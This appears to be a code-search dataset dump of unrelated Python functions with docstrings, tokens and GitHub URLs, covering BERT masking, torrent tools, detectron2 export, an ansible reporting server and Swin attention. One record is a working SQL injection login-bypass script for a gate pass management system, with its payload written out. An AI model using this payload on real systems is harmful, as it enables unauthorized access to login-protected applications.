            from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...].
            to_mask: int32 Tensor of shape [batch_size, to_seq_length].

        Returns:
            float Tensor of shape [batch_size, from_seq_length, to_seq_length].
        """
        # numpy or cupy depending on GPU usage
        xp = chainer.cuda.get_array_module(from_tensor)

        from_shape = from_tensor.shape
        batch_size = from_shape[0]
        from_seq_length = from_shape[1]

        to_shape = to_mask.shape
        to_seq_length = to_shape[1]

        mask = xp.broadcast_to(
            to_mask[:, None],
            (batch_size, from_seq_length, to_seq_length))
        return mask

function_tokens:
[ "def", "create_attention_mask_from_input_mask", "(", "from_tensor", ",", "to_mask", ")", ":", "# numpy or cupy depending on GPU usage", "xp", "=", "chainer", ".", "cuda", ".", "get_array_module", "(", "from_tensor", ")", "from_shape", "=", "from_tensor", ".", "shape", "batch_size", "=", "from_shape", "[", "0", "]", "from_seq_length", "=", "from_shape", "[", "1", "]", "to_shape", "=", "to_mask", ".", "shape", "to_seq_length", "=", "to_shape", "[", "1", "]", "mask", "=", "xp", ".", "broadcast_to", "(", "to_mask", "[", ":", ",", "None", "]", ",", "(", "batch_size", ",", "from_seq_length", ",", "to_seq_length", ")", ")", "return", "mask" ]
url: https://github.com/soskek/bert-chainer/blob/22cc04afff4d31b6a10e36bb32837216ede22a49/modeling.py#L571-L594

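The broadcasting step is the whole trick: the [batch, to_seq] mask gains a new from_seq axis and is repeated along it. A plain-NumPy shape sketch with toy sizes (no Chainer required):

    import numpy as np

    to_mask = np.array([[1, 1, 0],
                        [1, 0, 0]])        # [batch=2, to_seq=3]
    batch_size, from_seq_length, to_seq_length = 2, 4, 3

    # insert an axis, then broadcast: (2, 1, 3) -> (2, 4, 3)
    mask = np.broadcast_to(to_mask[:, None],
                           (batch_size, from_seq_length, to_seq_length))
    print(mask.shape)              # (2, 4, 3)
    print(mask[0, 0], mask[0, 3])  # identical rows: [1 1 0] [1 1 0]
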
nwo: effigies/BitTornado
sha: 03f64f2933678d08f104e340fa42b9b7d0c14993
path: btcopyannounce.py
language: python
identifier: main
parameters: (argv)
return_statement: return 0
docstring: Copy announce information from source to all specified torrents
docstring_summary: Copy announce information from source to all specified torrents
docstring_tokens:
[ "Copy", "announce", "information", "from", "source", "to", "all", "specified", "torrents" ]
function:

    def main(argv):
        """Copy announce information from source to all specified torrents"""
        program, _ = os.path.splitext(os.path.basename(argv[0]))
        usage = "Usage: %s <source.torrent> <file1.torrent> " \
                "[file2.torrent...]" % program
        try:
            opts, args = getopt.getopt(argv[1:], "hv", ("help", "verbose"))
        except getopt.error as msg:
            print(msg)
            return 1

        if len(args) < 2:
            print("{}\n{}\n".format(usage, main.__doc__))
            return 2

        source_metainfo = MetaInfo.read(args[0])

        verbose = False
        for opt, _ in opts:
            if opt in ('-h', '--help'):
                print("{}\n{}\n".format(usage, main.__doc__))
                return 0
            elif opt in ('-v', '--verbose'):
                verbose = True

        announce = source_metainfo['announce']
        announce_list = source_metainfo.get('announce-list')

        if verbose:
            print('new announce: ', announce)
            if announce_list:
                print('new announce-list: ', '|'.join(
                    ','.join(tier) for tier in announce_list))

        for fname in args[1:]:
            reannounce(fname, announce, announce_list, verbose)

        return 0

function_tokens:
[ "def", "main", "(", "argv", ")", ":", "program", ",", "_", "=", "os", ".", "path", ".", "splitext", "(", "os", ".", "path", ".", "basename", "(", "argv", "[", "0", "]", ")", ")", "usage", "=", "\"Usage: %s <source.torrent> <file1.torrent> \"", "\"[file2.torrent...]\"", "%", "program", "try", ":", "opts", ",", "args", "=", "getopt", ".", "getopt", "(", "argv", "[", "1", ":", "]", ",", "\"hv\"", ",", "(", "\"help\"", ",", "\"verbose\"", ")", ")", "except", "getopt", ".", "error", "as", "msg", ":", "print", "(", "msg", ")", "return", "1", "if", "len", "(", "args", ")", "<", "2", ":", "print", "(", "\"{}\\n{}\\n\"", ".", "format", "(", "usage", ",", "main", ".", "__doc__", ")", ")", "return", "2", "source_metainfo", "=", "MetaInfo", ".", "read", "(", "args", "[", "0", "]", ")", "verbose", "=", "False", "for", "opt", ",", "_", "in", "opts", ":", "if", "opt", "in", "(", "'-h'", ",", "'--help'", ")", ":", "print", "(", "\"{}\\n{}\\n\"", ".", "format", "(", "usage", ",", "main", ".", "__doc__", ")", ")", "return", "0", "elif", "opt", "in", "(", "'-v'", ",", "'--verbose'", ")", ":", "verbose", "=", "True", "announce", "=", "source_metainfo", "[", "'announce'", "]", "announce_list", "=", "source_metainfo", ".", "get", "(", "'announce-list'", ")", "if", "verbose", ":", "print", "(", "'new announce: '", ",", "announce", ")", "if", "announce_list", ":", "print", "(", "'new announce-list: '", ",", "'|'", ".", "join", "(", "','", ".", "join", "(", "tier", ")", "for", "tier", "in", "announce_list", ")", ")", "for", "fname", "in", "args", "[", "1", ":", "]", ":", "reannounce", "(", "fname", ",", "announce", ",", "announce_list", ",", "verbose", ")", "return", "0" ]
https://github.com/effigies/BitTornado/blob/03f64f2933678d08f104e340fa42b9b7d0c14993/btcopyannounce.py#L15-L54
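A minimal usage sketch for the `main` entry point above; the torrent file names are hypothetical and the usual script entry-point wiring is assumed:

import sys

# Copy announce data from tracker.torrent into two targets, verbosely:
#   $ btcopyannounce.py -v tracker.torrent a.torrent b.torrent
if __name__ == '__main__':
    sys.exit(main(sys.argv))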
facebookresearch/detectron2
cb92ae1763cd7d3777c243f07749574cdaec6cb8
detectron2/export/api.py
python
Caffe2Tracer.__init__
(self, cfg: CfgNode, model: nn.Module, inputs)
Args: cfg (CfgNode): a detectron2 config used to construct caffe2-compatible model. model (nn.Module): An original pytorch model. Must be among a few official models in detectron2 that can be converted to become caffe2-compatible automatically. Weights have to be already loaded to this model. inputs: sample inputs that the given model takes for inference. Will be used to trace the model. For most models, random inputs with no detected objects will not work as they lead to wrong traces.
Args: cfg (CfgNode): a detectron2 config used to construct caffe2-compatible model. model (nn.Module): An original pytorch model. Must be among a few official models in detectron2 that can be converted to become caffe2-compatible automatically. Weights have to be already loaded to this model. inputs: sample inputs that the given model takes for inference. Will be used to trace the model. For most models, random inputs with no detected objects will not work as they lead to wrong traces.
[ "Args", ":", "cfg", "(", "CfgNode", ")", ":", "a", "detectron2", "config", "used", "to", "construct", "caffe2", "-", "compatible", "model", ".", "model", "(", "nn", ".", "Module", ")", ":", "An", "original", "pytorch", "model", ".", "Must", "be", "among", "a", "few", "official", "models", "in", "detectron2", "that", "can", "be", "converted", "to", "become", "caffe2", "-", "compatible", "automatically", ".", "Weights", "have", "to", "be", "already", "loaded", "to", "this", "model", ".", "inputs", ":", "sample", "inputs", "that", "the", "given", "model", "takes", "for", "inference", ".", "Will", "be", "used", "to", "trace", "the", "model", ".", "For", "most", "models", "random", "inputs", "with", "no", "detected", "objects", "will", "not", "work", "as", "they", "lead", "to", "wrong", "traces", "." ]
def __init__(self, cfg: CfgNode, model: nn.Module, inputs): """ Args: cfg (CfgNode): a detectron2 config used to construct caffe2-compatible model. model (nn.Module): An original pytorch model. Must be among a few official models in detectron2 that can be converted to become caffe2-compatible automatically. Weights have to be already loaded to this model. inputs: sample inputs that the given model takes for inference. Will be used to trace the model. For most models, random inputs with no detected objects will not work as they lead to wrong traces. """ assert isinstance(cfg, CfgNode), cfg assert isinstance(model, torch.nn.Module), type(model) # TODO make it support custom models, by passing in c2 model directly C2MetaArch = META_ARCH_CAFFE2_EXPORT_TYPE_MAP[cfg.MODEL.META_ARCHITECTURE] self.traceable_model = C2MetaArch(cfg, copy.deepcopy(model)) self.inputs = inputs self.traceable_inputs = self.traceable_model.get_caffe2_inputs(inputs)
[ "def", "__init__", "(", "self", ",", "cfg", ":", "CfgNode", ",", "model", ":", "nn", ".", "Module", ",", "inputs", ")", ":", "assert", "isinstance", "(", "cfg", ",", "CfgNode", ")", ",", "cfg", "assert", "isinstance", "(", "model", ",", "torch", ".", "nn", ".", "Module", ")", ",", "type", "(", "model", ")", "# TODO make it support custom models, by passing in c2 model directly", "C2MetaArch", "=", "META_ARCH_CAFFE2_EXPORT_TYPE_MAP", "[", "cfg", ".", "MODEL", ".", "META_ARCHITECTURE", "]", "self", ".", "traceable_model", "=", "C2MetaArch", "(", "cfg", ",", "copy", ".", "deepcopy", "(", "model", ")", ")", "self", ".", "inputs", "=", "inputs", "self", ".", "traceable_inputs", "=", "self", ".", "traceable_model", ".", "get_caffe2_inputs", "(", "inputs", ")" ]
https://github.com/facebookresearch/detectron2/blob/cb92ae1763cd7d3777c243f07749574cdaec6cb8/detectron2/export/api.py#L50-L68
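A hedged construction sketch for the record above; the config file and the sample input are assumptions, and `Caffe2Tracer` is assumed to be re-exported from `detectron2.export`:

import torch
from detectron2.config import get_cfg
from detectron2.modeling import build_model
from detectron2.export import Caffe2Tracer

cfg = get_cfg()
cfg.merge_from_file("mask_rcnn_config.yaml")  # hypothetical config
model = build_model(cfg)  # weights must already be loaded, per the docstring
# Use realistic inputs: random images with no detections trace wrongly.
inputs = [{"image": torch.rand(3, 800, 800) * 255}]
tracer = Caffe2Tracer(cfg, model, inputs)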
1120362990/vulnerability-list
59a1b3f8f9c32ec2620b2953ab561b44a8e8dd95
gatepass_vuln/Gate_Pass_Management_System_login_SQL_Injection.py
python
attack
(URL)
[]
def attack(URL): print('[+] Start check - Gate_Pass_Management_System_login_SQL_Injection. [+]') url = URL + '/login-exec.php' data = { #'login': 'admin','password': '123456', 'login': r"'or 1=1 or ''='", 'password': r"'or 1=1 or ''='", 'Submit': 'value', } try: r = requests.post(url,data=data) if 'Please check your username and password' in r.text: print('[-] Wrong username or password; login bypass failed, no vulnerability.') print('Checked page: '+url) elif 'Industronics Engineering' in r.text: print('[+] Login bypass succeeded; SQL injection vulnerability present.') print('Vulnerable URL: '+url) print("Exploit: login='or 1=1 or ''='&password='or 1=1 or ''='&Submit=Login") else: print('[!] Error during check; the vulnerable page may not exist.') except: print('[!] Error while connecting to the port.') print('[+] Check finished - Gate_Pass_Management_System_login_SQL_Injection. [+]') print('\n')
[ "def", "attack", "(", "URL", ")", ":", "print", "(", "'[+] Start check - Gate_Pass_Management_System_login_SQL_Injection. [+]'", ")", "url", "=", "URL", "+", "'/login-exec.php'", "data", "=", "{", "#'login': 'admin','password': '123456',", "'login'", ":", "r\"'or 1=1 or ''='\"", ",", "'password'", ":", "r\"'or 1=1 or ''='\"", ",", "'Submit'", ":", "'value'", ",", "}", "try", ":", "r", "=", "requests", ".", "post", "(", "url", ",", "data", "=", "data", ")", "if", "'Please check your username and password'", "in", "r", ".", "text", ":", "print", "(", "'[-] Wrong username or password; login bypass failed, no vulnerability.'", ")", "print", "(", "'Checked page: '", "+", "url", ")", "elif", "'Industronics Engineering'", "in", "r", ".", "text", ":", "print", "(", "'[+] Login bypass succeeded; SQL injection vulnerability present.'", ")", "print", "(", "'Vulnerable URL: '", "+", "url", ")", "print", "(", "\"Exploit: login='or 1=1 or ''='&password='or 1=1 or ''='&Submit=Login\"", ")", "else", ":", "print", "(", "'[!] Error during check; the vulnerable page may not exist.'", ")", "except", ":", "print", "(", "'[!] Error while connecting to the port.'", ")", "print", "(", "'[+] Check finished - Gate_Pass_Management_System_login_SQL_Injection. [+]'", ")", "print", "(", "'\\n'", ")" ]
https://github.com/1120362990/vulnerability-list/blob/59a1b3f8f9c32ec2620b2953ab561b44a8e8dd95/gatepass_vuln/Gate_Pass_Management_System_login_SQL_Injection.py#L12-L34
ansible-community/ara
f366c9f9f2a06311dd67449f1124dca0674563c2
ara/server/wsgi.py
python
distributed_sqlite
(environ, start_response)
Custom WSGI application meant to work with ara.server.db.backends.distributed_sqlite in order to dynamically load different databases at runtime.
Custom WSGI application meant to work with ara.server.db.backends.distributed_sqlite in order to dynamically load different databases at runtime.
[ "Custom", "WSGI", "application", "meant", "to", "work", "with", "ara", ".", "server", ".", "db", ".", "backends", ".", "distributed_sqlite", "in", "order", "to", "dynamically", "load", "different", "databases", "at", "runtime", "." ]
def distributed_sqlite(environ, start_response): """ Custom WSGI application meant to work with ara.server.db.backends.distributed_sqlite in order to dynamically load different databases at runtime. """ # This endpoint is read only, do not accept write requests. if environ["REQUEST_METHOD"] not in ["GET", "HEAD", "OPTIONS"]: handle_405(start_response) script_name = get_script_name(environ) path_info = get_path_info(environ) from django.conf import settings # The root under which database files are expected root = settings.DISTRIBUTED_SQLITE_ROOT # The prefix after which everything should be delegated (ex: /ara-report) prefix = settings.DISTRIBUTED_SQLITE_PREFIX # Static assets should always be served by the regular app if path_info.startswith(settings.STATIC_URL): return application(environ, start_response) if prefix not in path_info: logger.warn("Ignoring request: URL does not contain delegated prefix (%s)" % prefix) return handle_404(start_response) # Slice path_info up until after the prefix to obtain the requested directory i = path_info.find(prefix) + len(prefix) fs_path = path_info[:i] # Make sure we aren't escaping outside the root and the directory exists db_dir = os.path.abspath(os.path.join(root, fs_path.lstrip("/"))) if not db_dir.startswith(root): logger.warn("Ignoring request: path is outside the root (%s)" % db_dir) return handle_404(start_response) elif not os.path.exists(db_dir): logger.warn("Ignoring request: database directory not found (%s)" % db_dir) return handle_404(start_response) # Find the database file and make sure it exists db_file = os.path.join(db_dir, "ansible.sqlite") if not os.path.exists(db_file): logger.warn("Ignoring request: database file not found (%s)" % db_file) return handle_404(start_response) # Tell Django about the new URLs it should be using environ["SCRIPT_NAME"] = script_name + fs_path environ["PATH_INFO"] = path_info[len(fs_path) :] # noqa: E203 # Store the path of the database in a thread so the distributed_sqlite # database backend can retrieve it. from ara.server.db.backends.distributed_sqlite.base import local_storage local_storage.db_path = db_file try: return application(environ, start_response) finally: del local_storage.db_path
[ "def", "distributed_sqlite", "(", "environ", ",", "start_response", ")", ":", "# This endpoint is read only, do not accept write requests.", "if", "environ", "[", "\"REQUEST_METHOD\"", "]", "not", "in", "[", "\"GET\"", ",", "\"HEAD\"", ",", "\"OPTIONS\"", "]", ":", "handle_405", "(", "start_response", ")", "script_name", "=", "get_script_name", "(", "environ", ")", "path_info", "=", "get_path_info", "(", "environ", ")", "from", "django", ".", "conf", "import", "settings", "# The root under which database files are expected", "root", "=", "settings", ".", "DISTRIBUTED_SQLITE_ROOT", "# The prefix after which everything should be delegated (ex: /ara-report)", "prefix", "=", "settings", ".", "DISTRIBUTED_SQLITE_PREFIX", "# Static assets should always be served by the regular app", "if", "path_info", ".", "startswith", "(", "settings", ".", "STATIC_URL", ")", ":", "return", "application", "(", "environ", ",", "start_response", ")", "if", "prefix", "not", "in", "path_info", ":", "logger", ".", "warn", "(", "\"Ignoring request: URL does not contain delegated prefix (%s)\"", "%", "prefix", ")", "return", "handle_404", "(", "start_response", ")", "# Slice path_info up until after the prefix to obtain the requested directory", "i", "=", "path_info", ".", "find", "(", "prefix", ")", "+", "len", "(", "prefix", ")", "fs_path", "=", "path_info", "[", ":", "i", "]", "# Make sure we aren't escaping outside the root and the directory exists", "db_dir", "=", "os", ".", "path", ".", "abspath", "(", "os", ".", "path", ".", "join", "(", "root", ",", "fs_path", ".", "lstrip", "(", "\"/\"", ")", ")", ")", "if", "not", "db_dir", ".", "startswith", "(", "root", ")", ":", "logger", ".", "warn", "(", "\"Ignoring request: path is outside the root (%s)\"", "%", "db_dir", ")", "return", "handle_404", "(", "start_response", ")", "elif", "not", "os", ".", "path", ".", "exists", "(", "db_dir", ")", ":", "logger", ".", "warn", "(", "\"Ignoring request: database directory not found (%s)\"", "%", "db_dir", ")", "return", "handle_404", "(", "start_response", ")", "# Find the database file and make sure it exists", "db_file", "=", "os", ".", "path", ".", "join", "(", "db_dir", ",", "\"ansible.sqlite\"", ")", "if", "not", "os", ".", "path", ".", "exists", "(", "db_file", ")", ":", "logger", ".", "warn", "(", "\"Ignoring request: database file not found (%s)\"", "%", "db_file", ")", "return", "handle_404", "(", "start_response", ")", "# Tell Django about the new URLs it should be using", "environ", "[", "\"SCRIPT_NAME\"", "]", "=", "script_name", "+", "fs_path", "environ", "[", "\"PATH_INFO\"", "]", "=", "path_info", "[", "len", "(", "fs_path", ")", ":", "]", "# noqa: E203", "# Store the path of the database in a thread so the distributed_sqlite", "# database backend can retrieve it.", "from", "ara", ".", "server", ".", "db", ".", "backends", ".", "distributed_sqlite", ".", "base", "import", "local_storage", "local_storage", ".", "db_path", "=", "db_file", "try", ":", "return", "application", "(", "environ", ",", "start_response", ")", "finally", ":", "del", "local_storage", ".", "db_path" ]
https://github.com/ansible-community/ara/blob/f366c9f9f2a06311dd67449f1124dca0674563c2/ara/server/wsgi.py#L47-L105
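The SCRIPT_NAME/PATH_INFO split above is the subtle part; a standalone sketch with hypothetical values:

prefix = "/ara-report"  # settings.DISTRIBUTED_SQLITE_PREFIX
path_info = "/users/alice/ara-report/api/v1/playbooks"  # hypothetical request path
i = path_info.find(prefix) + len(prefix)
fs_path = path_info[:i]               # "/users/alice/ara-report"
rest = path_info[len(fs_path):]       # "/api/v1/playbooks"
# fs_path locates <root>/users/alice/ara-report/ansible.sqlite on disk;
# `rest` becomes the PATH_INFO that the Django application sees.
print(fs_path, rest)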
twschiller/open-synthesis
4c765c1105eea31a039dde25e53ee8d3612dd206
openach/templatetags/board_extras.py
python
url_replace
(request, field, value)
return dict_.urlencode()
Return a GET dictionary with field=value.
Return a GET dictionary with field=value.
[ "Return", "a", "GET", "dictionary", "with", "field", "=", "value", "." ]
def url_replace(request, field, value): """Return a GET dictionary with field=value.""" # taken from: https://stackoverflow.com/questions/2047622/how-to-paginate-django-with-other-get-variables dict_ = request.GET.copy() dict_[field] = value return dict_.urlencode()
[ "def", "url_replace", "(", "request", ",", "field", ",", "value", ")", ":", "# taken from: https://stackoverflow.com/questions/2047622/how-to-paginate-django-with-other-get-variables", "dict_", "=", "request", ".", "GET", ".", "copy", "(", ")", "dict_", "[", "field", "]", "=", "value", "return", "dict_", ".", "urlencode", "(", ")" ]
https://github.com/twschiller/open-synthesis/blob/4c765c1105eea31a039dde25e53ee8d3612dd206/openach/templatetags/board_extras.py#L225-L230
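A hypothetical template usage for the tag above: a pagination link that swaps `page` while preserving the other GET parameters:

# Given a request for ?page=1&sort=name:
#
#   <a href="?{% url_replace request 'page' 2 %}">next</a>
#
# renders as <a href="?page=2&sort=name">next</a>, because only the
# copied QueryDict's `page` entry is replaced before urlencode().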
grnet/synnefo
d06ec8c7871092131cdaabf6b03ed0b504c93e43
astakosclient/astakosclient/__init__.py
python
AstakosClient.service_get_username
(self, uuid)
Return the displayName of a uuid using a service's token
Return the displayName of a uuid using a service's token
[ "Return", "the", "displayName", "of", "a", "uuid", "using", "a", "service", "s", "token" ]
def service_get_username(self, uuid): """Return the displayName of a uuid using a service's token""" check_input("service_get_username", self.logger, uuid=uuid) uuid_dict = self.service_get_usernames([uuid]) if uuid in uuid_dict: return uuid_dict.get(uuid) else: raise NoUserName(uuid)
[ "def", "service_get_username", "(", "self", ",", "uuid", ")", ":", "check_input", "(", "\"service_get_username\"", ",", "self", ".", "logger", ",", "uuid", "=", "uuid", ")", "uuid_dict", "=", "self", ".", "service_get_usernames", "(", "[", "uuid", "]", ")", "if", "uuid", "in", "uuid_dict", ":", "return", "uuid_dict", ".", "get", "(", "uuid", ")", "else", ":", "raise", "NoUserName", "(", "uuid", ")" ]
https://github.com/grnet/synnefo/blob/d06ec8c7871092131cdaabf6b03ed0b504c93e43/astakosclient/astakosclient/__init__.py#L374-L381
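A usage sketch for the record above; the endpoint, token and uuid are hypothetical, and the import paths are assumptions:

from astakosclient import AstakosClient
from astakosclient.errors import NoUserName

client = AstakosClient("service-token", "https://astakos.example.org/identity")
try:
    print(client.service_get_username("b3d1f-uuid"))  # hypothetical uuid
except NoUserName:
    print("uuid has no known display name")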
InQuest/omnibus
88dbf5d02f87eaa79a1cfc13d403cf854ee44c40
lib/modules/cybercure.py
python
Plugin.run
(self)
[]
def run(self): url = 'http://api.cybercure.ai/feed/search?value=%s' % self.artifact['name'] headers = {'User-Agent': 'OSINT Omnibus (https://github.com/InQuest/Omnibus)'} try: status, response = get(url, headers=headers) if status: results = response.json() self.artifact['data']['cybercure'] = results except Exception as err: warning('Caught exception in module (%s)' % str(err))
[ "def", "run", "(", "self", ")", ":", "url", "=", "'http://api.cybercure.ai/feed/search?value=%s'", "%", "self", ".", "artifact", "[", "'name'", "]", "headers", "=", "{", "'User-Agent'", ":", "'OSINT Omnibus (https://github.com/InQuest/Omnibus)'", "}", "try", ":", "status", ",", "response", "=", "get", "(", "url", ",", "headers", "=", "headers", ")", "if", "status", ":", "results", "=", "response", ".", "json", "(", ")", "self", ".", "artifact", "[", "'data'", "]", "[", "'cybercure'", "]", "=", "results", "except", "Exception", "as", "err", ":", "warning", "(", "'Caught exception in module (%s)'", "%", "str", "(", "err", ")", ")" ]
https://github.com/InQuest/omnibus/blob/88dbf5d02f87eaa79a1cfc13d403cf854ee44c40/lib/modules/cybercure.py#L18-L28
guildai/guildai
1665985a3d4d788efc1a3180ca51cc417f71ca78
guild/external/pip/_vendor/urllib3/fields.py
python
RequestField.make_multipart
(self, content_disposition=None, content_type=None, content_location=None)
Makes this request field into a multipart request field. This method overrides "Content-Disposition", "Content-Type" and "Content-Location" headers to the request parameter. :param content_type: The 'Content-Type' of the request body. :param content_location: The 'Content-Location' of the request body.
Makes this request field into a multipart request field.
[ "Makes", "this", "request", "field", "into", "a", "multipart", "request", "field", "." ]
def make_multipart(self, content_disposition=None, content_type=None, content_location=None): """ Makes this request field into a multipart request field. This method overrides "Content-Disposition", "Content-Type" and "Content-Location" headers to the request parameter. :param content_type: The 'Content-Type' of the request body. :param content_location: The 'Content-Location' of the request body. """ self.headers['Content-Disposition'] = content_disposition or 'form-data' self.headers['Content-Disposition'] += '; '.join([ '', self._render_parts( (('name', self._name), ('filename', self._filename)) ) ]) self.headers['Content-Type'] = content_type self.headers['Content-Location'] = content_location
[ "def", "make_multipart", "(", "self", ",", "content_disposition", "=", "None", ",", "content_type", "=", "None", ",", "content_location", "=", "None", ")", ":", "self", ".", "headers", "[", "'Content-Disposition'", "]", "=", "content_disposition", "or", "'form-data'", "self", ".", "headers", "[", "'Content-Disposition'", "]", "+=", "'; '", ".", "join", "(", "[", "''", ",", "self", ".", "_render_parts", "(", "(", "(", "'name'", ",", "self", ".", "_name", ")", ",", "(", "'filename'", ",", "self", ".", "_filename", ")", ")", ")", "]", ")", "self", ".", "headers", "[", "'Content-Type'", "]", "=", "content_type", "self", ".", "headers", "[", "'Content-Location'", "]", "=", "content_location" ]
https://github.com/guildai/guildai/blob/1665985a3d4d788efc1a3180ca51cc417f71ca78/guild/external/pip/_vendor/urllib3/fields.py#L157-L178
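A short usage sketch for `make_multipart`; the import path mirrors the vendored location in this record:

from pip._vendor.urllib3.fields import RequestField

field = RequestField(name="file", data=b"hello", filename="hello.txt")
field.make_multipart(content_type="text/plain")
print(field.headers["Content-Disposition"])
# -> form-data; name="file"; filename="hello.txt"
print(field.headers["Content-Type"])        # -> text/plain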
msr-fiddle/pipedream
7db6a1c3e64996d5b319faec6ca38cb31bfea1c4
runtime/communication.py
python
CommunicationHandler.start_helper_thread
(self, args_func, func, args_func_args, num_iterations)
Start passed-in func on a helper thread.
Start passed-in func on a helper thread.
[ "Start", "passed", "-", "in", "func", "on", "a", "helper", "thread", "." ]
def start_helper_thread(self, args_func, func, args_func_args, num_iterations): """ Start passed-in func on a helper thread. """ args_func_args += [num_iterations] args = args_func(*args_func_args) helper_thread = threading.Thread(target=func, args=args) helper_thread.start()
[ "def", "start_helper_thread", "(", "self", ",", "args_func", ",", "func", ",", "args_func_args", ",", "num_iterations", ")", ":", "args_func_args", "+=", "[", "num_iterations", "]", "args", "=", "args_func", "(", "*", "args_func_args", ")", "helper_thread", "=", "threading", ".", "Thread", "(", "target", "=", "func", ",", "args", "=", "args", ")", "helper_thread", ".", "start", "(", ")" ]
https://github.com/msr-fiddle/pipedream/blob/7db6a1c3e64996d5b319faec6ca38cb31bfea1c4/runtime/communication.py#L348-L356
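The `args_func`/`func` split above is a thunk pattern: build the thread's arguments lazily, then run `func` on them. A self-contained sketch with hypothetical names:

import threading

def make_recv_args(queue_name, num_iterations):  # plays the role of args_func
    return (queue_name, num_iterations)

def recv_loop(queue_name, num_iterations):       # plays the role of func
    for i in range(num_iterations):
        print(queue_name, i)

args_func_args = ["recv_queue"]
args_func_args += [3]   # num_iterations is appended, exactly as in the record
threading.Thread(target=recv_loop, args=make_recv_args(*args_func_args)).start()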
PaddlePaddle/PaddleX
2bab73f81ab54e328204e7871e6ae4a82e719f5d
paddlex/ppcls/arch/backbone/model_zoo/swin_transformer.py
python
WindowAttention.forward
(self, x, mask=None)
return x
Args: x: input features with shape of (num_windows*B, N, C) mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None
Args: x: input features with shape of (num_windows*B, N, C) mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None
[ "Args", ":", "x", ":", "input", "features", "with", "shape", "of", "(", "num_windows", "*", "B", "N", "C", ")", "mask", ":", "(", "0", "/", "-", "inf", ")", "mask", "with", "shape", "of", "(", "num_windows", "Wh", "*", "Ww", "Wh", "*", "Ww", ")", "or", "None" ]
def forward(self, x, mask=None): """ Args: x: input features with shape of (num_windows*B, N, C) mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None """ B_, N, C = x.shape qkv = self.qkv(x).reshape( [B_, N, 3, self.num_heads, C // self.num_heads]).transpose( [2, 0, 3, 1, 4]) q, k, v = qkv[0], qkv[1], qkv[2] q = q * self.scale attn = paddle.mm(q, k.transpose([0, 1, 3, 2])) index = self.relative_position_index.reshape([-1]) relative_position_bias = paddle.index_select( self.relative_position_bias_table, index) relative_position_bias = relative_position_bias.reshape([ self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1 ]) # Wh*Ww,Wh*Ww,nH relative_position_bias = relative_position_bias.transpose( [2, 0, 1]) # nH, Wh*Ww, Wh*Ww attn = attn + relative_position_bias.unsqueeze(0) if mask is not None: nW = mask.shape[0] attn = attn.reshape([B_ // nW, nW, self.num_heads, N, N ]) + mask.unsqueeze(1).unsqueeze(0) attn = attn.reshape([-1, self.num_heads, N, N]) attn = self.softmax(attn) else: attn = self.softmax(attn) attn = self.attn_drop(attn) # x = (attn @ v).transpose(1, 2).reshape([B_, N, C]) x = paddle.mm(attn, v).transpose([0, 2, 1, 3]).reshape([B_, N, C]) x = self.proj(x) x = self.proj_drop(x) return x
[ "def", "forward", "(", "self", ",", "x", ",", "mask", "=", "None", ")", ":", "B_", ",", "N", ",", "C", "=", "x", ".", "shape", "qkv", "=", "self", ".", "qkv", "(", "x", ")", ".", "reshape", "(", "[", "B_", ",", "N", ",", "3", ",", "self", ".", "num_heads", ",", "C", "//", "self", ".", "num_heads", "]", ")", ".", "transpose", "(", "[", "2", ",", "0", ",", "3", ",", "1", ",", "4", "]", ")", "q", ",", "k", ",", "v", "=", "qkv", "[", "0", "]", ",", "qkv", "[", "1", "]", ",", "qkv", "[", "2", "]", "q", "=", "q", "*", "self", ".", "scale", "attn", "=", "paddle", ".", "mm", "(", "q", ",", "k", ".", "transpose", "(", "[", "0", ",", "1", ",", "3", ",", "2", "]", ")", ")", "index", "=", "self", ".", "relative_position_index", ".", "reshape", "(", "[", "-", "1", "]", ")", "relative_position_bias", "=", "paddle", ".", "index_select", "(", "self", ".", "relative_position_bias_table", ",", "index", ")", "relative_position_bias", "=", "relative_position_bias", ".", "reshape", "(", "[", "self", ".", "window_size", "[", "0", "]", "*", "self", ".", "window_size", "[", "1", "]", ",", "self", ".", "window_size", "[", "0", "]", "*", "self", ".", "window_size", "[", "1", "]", ",", "-", "1", "]", ")", "# Wh*Ww,Wh*Ww,nH", "relative_position_bias", "=", "relative_position_bias", ".", "transpose", "(", "[", "2", ",", "0", ",", "1", "]", ")", "# nH, Wh*Ww, Wh*Ww", "attn", "=", "attn", "+", "relative_position_bias", ".", "unsqueeze", "(", "0", ")", "if", "mask", "is", "not", "None", ":", "nW", "=", "mask", ".", "shape", "[", "0", "]", "attn", "=", "attn", ".", "reshape", "(", "[", "B_", "//", "nW", ",", "nW", ",", "self", ".", "num_heads", ",", "N", ",", "N", "]", ")", "+", "mask", ".", "unsqueeze", "(", "1", ")", ".", "unsqueeze", "(", "0", ")", "attn", "=", "attn", ".", "reshape", "(", "[", "-", "1", ",", "self", ".", "num_heads", ",", "N", ",", "N", "]", ")", "attn", "=", "self", ".", "softmax", "(", "attn", ")", "else", ":", "attn", "=", "self", ".", "softmax", "(", "attn", ")", "attn", "=", "self", ".", "attn_drop", "(", "attn", ")", "# x = (attn @ v).transpose(1, 2).reshape([B_, N, C])", "x", "=", "paddle", ".", "mm", "(", "attn", ",", "v", ")", ".", "transpose", "(", "[", "0", ",", "2", ",", "1", ",", "3", "]", ")", ".", "reshape", "(", "[", "B_", ",", "N", ",", "C", "]", ")", "x", "=", "self", ".", "proj", "(", "x", ")", "x", "=", "self", ".", "proj_drop", "(", "x", ")", "return", "x" ]
https://github.com/PaddlePaddle/PaddleX/blob/2bab73f81ab54e328204e7871e6ae4a82e719f5d/paddlex/ppcls/arch/backbone/model_zoo/swin_transformer.py#L170-L213
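Shape bookkeeping for the forward pass above, worked with hypothetical sizes (7x7 windows, 3 heads, C=96, 8 windows per image, batch 2):

# B_ = num_windows * B = 8 * 2 = 16,  N = 7 * 7 = 49,  C // num_heads = 32
# qkv(x)   : [16, 49, 288] -> reshape [16, 49, 3, 3, 32] -> transpose [3, 16, 3, 49, 32]
# q @ k^T  : [16, 3, 49, 32] x [16, 3, 32, 49] -> attn [16, 3, 49, 49]
# bias     : relative_position_bias [3, 49, 49], broadcast over the 16 windows
# with mask: attn viewed as [2, 8, 3, 49, 49] + mask.unsqueeze(1).unsqueeze(0) [1, 8, 1, 49, 49]
# output   : attn @ v [16, 3, 49, 32] -> transpose/reshape back to [16, 49, 96]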
